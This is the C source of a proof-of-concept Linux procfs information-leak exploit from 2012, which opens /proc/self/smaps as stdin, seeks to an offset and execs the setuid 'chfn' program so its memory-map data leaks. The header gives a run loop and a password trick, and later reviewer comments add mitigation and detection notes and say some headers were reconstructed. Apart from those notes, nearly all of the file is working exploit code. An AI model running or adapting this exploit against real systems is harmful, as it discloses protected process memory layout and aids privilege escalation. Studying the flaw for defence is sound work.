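/*
 * Procfs (2) leak
 * Author: Djalal - tixxdz
 *
 * Leak setuid proc files: smaps (maps ... ?)
 *
 * This will leak info of 'chfn' setuid program
 * We can expand it to leak proc files of any process.
 *
 * To test, set your user password to:
 * "Locked: 0 kB"
 *
 * Run with:
 * $ for i in $(seq 460 480); \
 *      do ./procfs_leak_2 /usr/bin/chfn /proc/self/smaps $i; done
 *
 * For testing only.
 *
 * 02/02/2012
 *
 * Reviewer notes (defensive reading):
 *  - The descriptor is opened without O_CLOEXEC, so it stays open across
 *    execv() and the new program image inherits it as stdin. Any access
 *    decision made at open() time was made for the pre-exec process.
 *  - The general mitigation for this class is for sensitive per-process
 *    procfs files to re-check access when they are read, or to refuse I/O
 *    on descriptors opened before a credential-changing exec. Which kernel
 *    versions do so is not stated on this page; verify against the
 *    changelog of the kernel under test.
 *  - For detection, a set-ID program that starts with stdin bound to a
 *    /proc/<pid>/ entry is unusual and worth flagging in exec telemetry.
 */

#define _LARGEFILE64_SOURCE
#define _GNU_SOURCE

/*
 * NOTE(review): the header names were lost when this listing was extracted
 * (nine bare "#include" tokens remain). The list below is reconstructed from
 * the identifiers the code uses, not copied from the original.
 */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/**
 * Open @file read-only, install it as stdin positioned at @offset, then
 * replace the current process image with @prog.
 *
 * @param prog    path of the program to exec; also passed as its argv[0].
 * @param file    path of the file to open.
 * @param offset  absolute position (SEEK_SET) applied to stdin before exec.
 * @return -1 on any failure. Does not return when execv() succeeds.
 *
 * On a failure after dup2(), stdin of the calling process has already been
 * replaced, so the caller should not expect to read its original stdin.
 */
int leak(char *prog, char *file, off64_t offset)
{
    char *argv[] = { prog, NULL };
    int fd_leak;

    /*
     * The original also formatted "/proc/<pid>/<file>" into a local buffer
     * that was never read; that dead code (and its getpid() call) is gone.
     */
    fd_leak = open(file, O_RDONLY);
    if (fd_leak == -1) {
        perror("open");
        return -1;
    }

    /* The original ignored dup2() failures and went on to seek/exec anyway. */
    if (dup2(fd_leak, STDIN_FILENO) == -1) {
        perror("dup2");
        close(fd_leak);
        return -1;
    }

    if (lseek64(STDIN_FILENO, offset, SEEK_SET) == (off64_t) -1) {
        perror("lseek64");
        close(fd_leak);     /* was leaked on this path */
        return -1;
    }

    /* NOTE(review): the author does not say why the one-second delay is needed. */
    sleep(1);

    /* Both fd 0 and fd_leak remain open across the exec, as in the original. */
    execv(argv[0], argv);

    /* Only reached when execv() failed. */
    perror("execv");
    close(fd_leak);
    return -1;
}

/**
 * Parse <program> <file> <offset> from the command line and hand them to
 * leak(). Returns -1 on a usage or parse error, otherwise leak()'s result.
 */
int main(int argc, char **argv)
{
    char *program = NULL;
    char *proc_file = NULL;
    char *end = NULL;
    long long parsed = 0;

    if (argc < 4) {
        /*
         * The angle-bracket placeholders were stripped from the listing;
         * the names below are reconstructed from the descriptions.
         */
        printf("%s <program> <file> <offset>\n"
               "  <program>: path of a setuid program.\n"
               "  <file>: file to read.\n"
               "  <offset>: Offset.\n", argv[0]);
        return -1;
    }

    program = argv[1];
    proc_file = argv[2];

    /* strtoll instead of atol: reject non-numeric or out-of-range offsets. */
    errno = 0;
    parsed = strtoll(argv[3], &end, 10);
    if (end == argv[3] || *end != '\0' || errno == ERANGE) {
        fprintf(stderr, "invalid offset: %s\n", argv[3]);
        return -1;
    }

    return leak(program, proc_file, (off64_t) parsed);
}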